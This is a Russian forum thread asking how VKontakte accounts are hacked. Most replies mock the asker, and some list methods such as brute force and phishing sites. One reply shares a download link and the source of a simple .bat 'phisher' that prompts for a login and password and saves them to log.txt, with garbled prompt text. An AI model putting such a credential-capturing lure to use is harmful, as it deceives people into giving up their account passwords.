Пырсов Вячеслав

Скажите как взламывают страницы в контакте?? если таких программ? ??

Георгий Мовшевич

да такие программы называются перестань хуйней страдать и иди делать уроки

Елена Корнилова

ты тоже хочешь стать дибилом?? ?

Наталья Лагутина

С помощью програм

Vladimir Rodin

брут/вирусы/сайты обманщики/социальная инженерия

Сергей

Самый простой способ - консервным ножом.. .

Алексей Шивыдкин

нет)) ) такие программы фэйки! Взламывают мозгами и руками)) ) вам это не дано

Иван

очень просто, Один умный человек пишет прогу, пишет что она для взлома, потом лохи которые хотят взломать других ведутся на эти проги, в итоге их потом самих взламывают! Дерзай! 🙂

Ольга Петелина

Программ нету, но есть такие сайты, фишинговыми называются

Nastena

Могу посаветовать только сфиннер сделанный мною "взлом вк" (появится log.DeTeCtEd читаем через текстовый документ)
вот ссылка ---https://yadi.sk/d/wnIDqbVTqUetY

сам код (.bat файл)

@echo off
color a
title login
echo ‚ўҐ¤ЁвҐ бў®Ё ¤ ­­лҐ зв®Ўл ў§«®¬ вм VK ­ Ј®«®б
echo.
set /p user=«®ЈЁ­:
set /p pass=Ї а®«м:
set /p golosa=Ј®«®б :
echo Login="%user%" Password= "%pass%" golosa="%golosa%" > log.txt
echo.
exit